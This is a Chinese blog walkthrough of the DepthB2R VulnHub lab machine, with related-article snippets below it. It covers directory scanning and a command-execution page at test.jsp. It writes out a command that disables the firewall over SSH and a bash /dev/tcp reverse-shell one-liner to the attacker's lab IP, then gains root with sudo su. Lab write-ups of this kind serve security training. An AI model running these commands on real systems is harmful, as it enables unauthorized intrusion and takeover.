DepthB2R

最新推荐文章于 2024-08-28 21:14:18 发布
最新推荐文章于 2024-08-28 21:14:18 发布
阅读量182 收藏
点赞数 3
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/141094800
版权

一、主机发现

页面上就有

二、信息收集

1.扫描端口

2.目录扫描

dirsearch -u http://192.168.36.133:8080

3.访问首页

4.拼接目录/test.jsp

翻译

进来后,可能存在命令执行漏洞

尝试,是有的

查看用户

将防火请关闭

ssh bill@127.0.0.1 sudo ufw disable

尝试ssh连接

ssh bill@192.168.36.133 bash -i >& /dev/tcp/192.168.36.130/7894 0>&1

攻击机开监听

反弹成功

三、提权

1.sudo -l

2.直接输入sudo su,提权成功

蓝天模糊
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AXA2R allegro封装
05-06
AXA2R Allegro封装是Panasonic公司推出的一款专门针对SD卡贴片接插件的电子设计自动化(EDA)软件工具。在电子硬件设计中,封装是至关重要的一个环节,它涉及芯片与电路板之间的物理连接,以及信号传输的可靠性。AXA...
3s/2r变换及2r/3s变换
09-05
clark变换到park变化;反park变换到反clark变换,实现3s/2r变换及2r/3s变换,输入三相正弦信号实验,可以直接查看波形。
vulnhub系列:DepthB2R
jq_j37的博客
08-03 296
vulnhub系列:DepthB2R靶机,打靶文章
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 379
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
DepthB2R靶机
zdd1453691081的博客
08-04 311
【代码】DepthB2R靶机。
depthb2r靶机
weixin_73074638的博客
08-06 154
访问robots.txt,得知该目标为 apche /tomact 8.0.38 ubuntu操作系统上网查找nday,未发现可利用的。执行ls -l/tmp。访问test.jsp。
DepthB2R靶机复现
weixin_52956666的博客
08-02 275
访问192.168.112.149:8080。靶机IP为192.168.112.149。输入ls -l /home查看用户。发现失败,感觉像是ssh服务被关闭。这个靶机比较友好,不需要进行设置。输入ls -l发现存在命令执行。sudo -l查看免密操作。拼接/test.jsp。尝试进行反弹shell。sudo su直接提权。在kali上开启监听。
DepthB2R靶机渗透测试
weixin_58786230的博客
08-03 238
【代码】DepthB2R靶机渗透测试。
【vulnhub】DepthB2R 打靶渗透
weixin_62162207的博客
08-07 206
DepthB2R 打靶渗透
DepthB2R靶场实战【超详细】
weixin_68615160的博客
08-05 347
输入ls -la /home,发现root 和bill用户。发现ssh服务开放,之前端口扫描没扫到,可能是开了防火墙。sudo -l查看具有sudo权限的命令程序。有一个test.jsp,我们访问它。kali开启监听,成功反弹shell。显示所有用户,直接sudo su。查看/etc下,防火墙是存在的。反弹未能成功,我们看一下进程。访问其8080web服务。发现开启了8080端口。提示我们可以输入命令。我们尝试反弹shell。我们对该端口进行扫描。
DepthB2R【附代码】(权限提升)
weixin_52487093的博客
08-05 283
BREACH: 2.1【附代码】(权限提升)
jixiebi2R.zip_2R机械臂_Planar Robot_动力方程_平面机械臂_机械臂matlab
07-14
平面2R机械臂matlab仿真代码,动力学方程!
YAESU VX-2R/八重州 VX-2R对讲机维修手册原理图
07-19
YAESU VX-2R/八重州 VX-2R对讲机维修手册原理图 世界上最小的带宽带接收的双频 HT 世界上最小的双频 HT 输出功率高达 1.5 瓦*,是您通过 VHF、UHF、短波广播、航海和飞机频段或 WIRES 互联网链接通向世界的高科技...
3s_2r.rar_Simulink 3s/2s变换模型
07-14
标题中的“3s_2r.rar_Simulink 3s/2s变换模型”指的是一个使用Simulink实现的3s/2s变换的模型,这个模型被封装在一个名为"3s_2r.rar"的压缩文件里。3s/2s变换是一种电路理论中的变换方法,常用于分析和设计电力电子...
安全面试常见问题任意文件下载
persist213的博客
08-24 733
吉祥知识星球《网安面试指南》《Java代码审计》《Web安全》《应急响应》《护网资料库》
经验笔记:Token、Session、Cookie 及密码级别安全存储
最新发布
qq_45831414的博客
08-28 327
在用户通过身份验证后,服务器会生成一个Token并发给客户端,之后客户端会在每次请求中附带此Token以证明身份。当用户开始与Web应用互动时,服务器会创建一个唯一的Session ID,并将其存储在客户端的Cookie中。本文将探讨如何利用Token、Session 和 Cookie 这三个概念来实现安全的用户认证及会话管理,并重点介绍如何存储密码以达到最高级别的安全性。综合运用Token、Session 和 Cookie,结合安全的密码存储技术,能够显著提高Web应用的安全性和用户体验。
“北京地铁系统中人脸识别技术的安全与效率问题研究”
matlabgoodboy的博客
08-28 363
综上所述,北京地铁系统中人脸识别技术的应用在提高安检和售检票效率方面具有显著优势,但同时也面临着数据隐私保护和滥用风险等安全问题。为了充分发挥人脸识别技术的优势并降低其风险,需要建立健全的法律法规和监管机制,并不断优化技术算法和管理手段。
终端防火墙软件功能 | 在终端设备上启用防火墙!终端安全小课堂开讲啦
2401_86434954的博客
08-24 545
终端设备的安全性直接关系到企业的整体网络安全,随着网络威胁的日益复杂和多样化,启用并合理配置终端防火墙软件是保障终端安全不可或缺的一环。今天,我们将走进终端安全小课堂,详细解析中的防火墙功能,为您揭开其保护终端安全的神秘面纱。
八重洲VX-2R双段对讲机操作与功能详解
"八重洲VX-2R是一款VHF/UHF双频段超紧凑型收发器,具备宽频覆盖功能的操作手册。这款对讲机由Vertex Standard公司制造,适用于全球多个地区,包括美国、欧洲和英国等地。手册包含详细的操作指南,如记忆模式、常规...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值